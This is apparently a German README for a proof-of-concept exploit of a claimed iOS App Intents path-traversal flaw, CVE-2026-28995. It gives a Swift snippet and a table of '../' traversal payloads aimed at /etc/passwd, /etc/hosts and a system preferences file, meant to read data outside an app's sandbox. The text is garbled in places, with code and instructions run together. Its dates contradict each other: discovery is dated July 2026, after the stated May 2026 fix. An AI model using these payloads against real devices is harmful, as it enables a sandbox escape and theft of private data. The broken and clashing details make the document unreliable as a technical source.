
# CVE-2026-28995 Proof-of-Concept für CVE-2026-28995 — Path-Traversal-Schwachstelle in App Intents auf iOS 26.4.2 und darunter.
Proof of Concept für CVE-2026-28995 — Path-Traversal-Schwachstelle in App Intents auf iOS 26.4.2 und darunter.
Diese Schwachstelle ermöglicht es einer bösartigen App, beliebige Dateien außerhalb ihres Sandboxes über App Intents zu lesen. Die Ursache ist eine unzureichende Pfadvalidierung im App-Intents-Framework von Apple.
Betroffene Versionen: iOS 26.4.2 und darunter
Behoben in: iOS 26.5 (11. Mai 2026)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
| Pfad | Liest |
|---|
../../../../../../../../../../../../../etc/passwd | Benutzerpasswörter |
../../../../../../../../../../../../../etc/hosts | Hosts-Datei |
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist | Systemeinstellungen |
Wenn der Pfad auf ein Verzeichnis zeigt, gibt die Funktion Folgendes zurück:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
CVE-2026-28995.swift zum Projekt hinzu.readCve(path:) mit dem Zielpfad auf.Entdeckt: 1. Juli 2026
Behoben in: iOS 26.5 (11. Mai 2026)